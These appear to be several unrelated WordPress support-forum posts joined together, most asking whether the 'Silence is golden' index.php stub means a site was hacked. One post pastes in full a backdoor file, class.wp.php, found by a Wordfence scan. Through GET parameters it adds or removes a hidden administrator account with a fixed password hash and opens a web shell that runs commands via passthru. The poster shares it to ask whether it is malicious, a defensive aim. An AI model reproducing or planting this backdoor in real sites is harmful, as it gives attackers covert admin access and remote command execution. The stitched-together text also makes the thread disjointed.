Why doesn’t Securi mark this as okay automatically?

I was checking if I could access to the php files directly in the browser and I saw that one of them shows part of the text or/and code.

I tested this with:

– twentytwenty

– twentyfifteen

– catch-evolution

– blankslate

The code or text displayed is part of that .php file, but not all. I am not sure if this important, if I am allowed to explain this issue here nor where I should report this problem to give more details.

When I scanned with wordfence, it detected that an unknown file was in my wp-includes directory named class.wp.php. I deleted the file from the directory but have kept it on my desktop for observation. I am posting the code here, kindly tell me if it is malicious or not, or if it has other files as well.

<?php error_reporting(0);
include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
$table_name = $wpdb->get_blog_prefix();
$sample = 'a:1:{s:13:"administrator";b:1;}';
if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
if( isset($_GET['awu']) ) {
$wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '1001010');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
if( isset($_GET['dwu']) ) { 
$wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 1001010");
$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 1001010");} 
if( isset($_GET['console']) ) {function  MakeSimpleForm() { ?> <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
<input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form> <? } function DoCmd($cmd) { ?>
<textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
DoCmd($_REQUEST['cmd']); else MakeSimpleForm();}?>

wp-content
plugins
akismet
themes

I am concerned with starting out with a site that appears to be hacked.

Any suggestions?

Fatal error: Unknown: Cannot use output buffering in output buffering display handlers in Unknown on line 0

On digging a little deeper I found the index.php with

<?php
// Silence is golden.
?>

Has my site been hacked ? I have search this site and found must comments on this were 4-5 years old

Any suggestion to resolve it would be welcome

Thanks

I went to the file manager on ipower to look at the code for the wordpress index page on my site and found only the following code

<?php
// Silence is golden.
?>

I’m guessing this is some sort of hack, so I’m left trying to figure out if it is possible to save my blog content and how to prevent a similar hack occurring in the future once I get this issue resolved.

Any help is appreciated. Thanks, Hamilton

Filename: wp-content/index.php
File type: Core
Issue first detected: 21 hours 33 mins ago.
Severity: Critical
Status New
This WordPress core file has been modified and differs from the original file distributed with this version of WordPress.

The file now reads:

<?php
// Silence is golden.
?>

Apparently, the only change was the addition of the ?> at the end of the file.

The original file I downloaded when i installed wordpress does not contain that. What should I do?

I have installed and used the Silence is Golden Plugin. Now I cannot access my admin area (the admin login screen). All I get is a 404 page, meaning that I am locked out of my site. Just in case this matters: I do NOT use WP Super Cache. I DO use the W3 Cache plugin. Any help please?

Today i wanted to do a post on my blog, but i couldn’t reach my admin. So i started seeking in the code what could cause the problem en in this file i found why my wordpress acted very strange;

/wp-content/themes/index.php

Normale this file contains basic settings of the wordpress installation, but this time it contained the phrase: “Silcence is golden”. When i googled that phrase i saw it meant my blog was hacked or something like that.

It’s very strange, because i only used a few plugin’s, had a very strong password what was nowhere noticed and i had the latest WordPress version…

Well never mind, i thought, i downloaded a new clean wordpress installation and opened it from the .rar / .zip file. After opening, the first thing i had done was checking the index.php in the theme folder… And there it is.. Silcence is golden. So does that means my installation is corrupted? Or is WordPress hacked or something like that (can’t be true, can it…)?

I’m always working on my mac, and my virusscanner also hasn’t detect a virus or something like that. The strange thing is that the same happens when i take my laptop (windows). The same thing happens there..

Can someone please tell me how to fix this? Thanks!

<?php
// Silence is golden.
?>

has been put in my index.php files in my theme folder and in the contents in my ftp. If I simply delete the code will that solve the problem? It would leave me with a blank index file.

Thanks!